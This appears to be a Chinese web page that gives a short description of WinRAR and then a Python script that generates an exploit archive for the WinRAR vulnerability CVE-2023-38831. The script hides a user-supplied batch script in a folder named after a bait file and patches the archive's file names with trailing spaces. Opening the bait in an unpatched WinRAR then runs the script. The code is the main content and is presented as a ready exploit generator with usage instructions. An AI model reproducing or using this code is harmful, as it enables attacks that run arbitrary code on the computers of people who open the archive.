WinRAR 是一款功能强大的压缩包管理器，它是档案工具RAR在 Windows环境下的图形界面。该软件可用于备份数据，缩减电子邮件附件的大小，解压缩从 Internet 上下载的RAR、ZIP及其它类型文件，并且可以新建 RAR 及 ZIP 格式等的压缩类文件。

#!/usr/bin/env python3# -*- coding: utf-8 -*-
import shutilimport osimport sys
TEMPLATE_NAME = "TEMPLATE"OUTPUT_NAME = "CVE-2023-38831-poc.rar"
BAIT_NAME = "test.txt"SCRIPT_NAME = "test.bat"
def main():    global BAIT_NAME, SCRIPT_NAME, OUTPUT_NAME  # 声明为全局变量
    # 处理命令行参数    if len(sys.argv) > 3:        BAIT_NAME = os.path.basename(sys.argv[1])        SCRIPT_NAME = os.path.basename(sys.argv[2])        OUTPUT_NAME = os.path.basename(sys.argv[3])    elif len(sys.argv) == 2 and sys.argv[1] == "poc":        pass    else:        print("""用法：              python cve-2023-38831-exp-gen.py poc              python cve-2023-38831-exp-gen.py <BAIT_NAME> <SCRIPT_NAME> <OUTPUT_NAME>""")        sys.exit()
    # 提取鱼叉文件名的扩展名    BAIT_EXT = b"." + bytes(BAIT_NAME.split(".")[-1], "utf-8")
    print("鱼叉文件名:", BAIT_NAME)    print("脚本文件名:", SCRIPT_NAME)    print("输出文件名:", OUTPUT_NAME)
    # 清理并创建必要的目录    if os.path.exists(TEMPLATE_NAME):        shutil.rmtree(TEMPLATE_NAME)    os.mkdir(TEMPLATE_NAME)    d = os.path.join(TEMPLATE_NAME, BAIT_NAME + "A")    if not os.path.exists(d):        os.mkdir(d)
    # 复制文件到模板目录    shutil.copyfile(SCRIPT_NAME, os.path.join(d, BAIT_NAME + "A.cmd"))    shutil.copyfile(BAIT_NAME, os.path.join(TEMPLATE_NAME, BAIT_NAME + "B"))
    # 创建模板目录的 zip 压缩文件    shutil.make_archive(TEMPLATE_NAME, 'zip', TEMPLATE_NAME)
    # 读取、修改并写回 zip 压缩文件    with open(TEMPLATE_NAME + ".zip", "rb") as f:        content = f.read()        content = content.replace(BAIT_EXT + b"A", BAIT_EXT + b" ")        content = content.replace(BAIT_EXT + b"B", BAIT_EXT + b" ")
    os.remove(TEMPLATE_NAME + ".zip")
    # 将修改后的内容保存为最终输出文件    with open(OUTPUT_NAME, "wb") as f:        f.write(content)
    print("成功生成漏洞利用代码。")
if __name__ == "__main__":    main()